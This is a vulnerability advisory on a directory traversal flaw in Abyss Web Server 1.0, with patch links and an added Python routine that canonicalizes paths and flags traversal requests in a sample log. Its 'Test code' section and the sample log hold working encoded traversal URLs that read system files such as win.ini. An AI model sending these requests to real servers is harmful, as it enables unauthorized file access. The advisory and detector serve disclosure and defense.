Abyss Web Server Directory Traversal Vulnerability

Published: 2002-08-29
Updated: 2002-08-29
Severity: High
Threat: Remote unauthorized file access
Bug type: Input validation error
Exploit mode: Server mode
BUGTRAQ ID: 5547

Affected systems
Aprelium Technologies Abyss Web Server 1.0

Detailed description
Abyss Web Server has a directory traversal problem. Because it does not correctly handle the UNICODE-encoded '\' character, an attacker can send a request containing the sequence '%2e%2e%5c' to bypass the ROOT directory restriction and read the contents of system files.

Test code
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
"GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0" (using a Telnet client)
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt/
http://host/%2f%2e%2e%2f
http://host/%2f%2e%2e%2fcgi-bin/

Solution
Upgrade the program:

Aprelium Technologies Abyss Web Server 1.0:
Aprelium Technologies Patch abyssws.exe: http://www.aprelium.com/data/patch1033/abyssws.exe (Windows patch)
Aprelium Technologies Patch abyssws: http://www.aprelium.com/data/patch1033/abyssws (Linux patch)

Aprelium Technologies Abyss Web Server 1.0.3:
Aprelium Technologies Patch abyssws.exe: http://www.aprelium.com/data/patch1033/abyssws.exe (Windows patch)
Aprelium Technologies Patch abyssws: http://www.aprelium.com/data/patch1033/abyssws (Linux patch)

Related information
Discovered by Auriemma Luigi <aluigi@pivx.com>.

References:
http://www.aprelium.com/abyssws/index.html
http://www.aprelium.com/news/patch1033.html
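The root cause described above is that the server applied its document-root check before treating a percent-encoded backslash as a path separator. The following added example (not Abyss code or part of the advisory) shows the order a web server should use: percent-decode first, unify '\' and '/', then resolve '..' and refuse anything that climbs above the root. The same function is reused to flag the advisory's request strings in a constructed access log; all addresses and log lines are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (Common Log Format) mixing the advisory's
# traversal requests with ordinary ones; RFC 5737 documentation addresses.
SAMPLE_LOG = r'''
192.0.2.10 - - [29/Aug/2002:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 1532
192.0.2.10 - - [29/Aug/2002:10:00:02 +0000] "GET /docs/../index.html HTTP/1.0" 200 1532
192.0.2.44 - - [29/Aug/2002:10:00:03 +0000] "GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.0" 200 412
192.0.2.44 - - [29/Aug/2002:10:00:04 +0000] "GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0" 200 412
192.0.2.44 - - [29/Aug/2002:10:00:05 +0000] "GET /%2f%2e%2e%2fcgi-bin/ HTTP/1.0" 200 87
'''.strip()

REQUEST_TARGET = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/')

def canonical_path(raw_target: str):
    """Normalize a request target to a path inside the document root.

    Returns None when the request climbs above the root. Percent-decoding
    happens before the separator check and backslash counts as a separator,
    which is the case the advisory says Abyss mishandled.
    """
    path = raw_target.split("?", 1)[0]          # drop the query string
    path = unquote(unquote(path))               # second pass catches %255c-style double encoding
    path = path.replace("\\", "/")              # '\' and '%5c' become ordinary separators
    if "\x00" in path:
        return None                             # NUL would truncate a C path string
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                return None                     # '..' with nothing left to pop escapes the root
            parts.pop()
        else:
            parts.append(seg)
    return "/" + "/".join(parts)

def flag_traversal(log_text: str):
    """Return (client, raw_target) for every logged request that escapes the root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_TARGET.search(line)
        if m and canonical_path(m.group(1)) is None:
            hits.append((line.split(" ", 1)[0], m.group(1)))
    return hits

if __name__ == "__main__":
    for client, target in flag_traversal(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {target}")
```

A legitimate request such as /docs/../index.html normalizes to /index.html and is kept, so the check rejects only requests whose resolved path leaves the root.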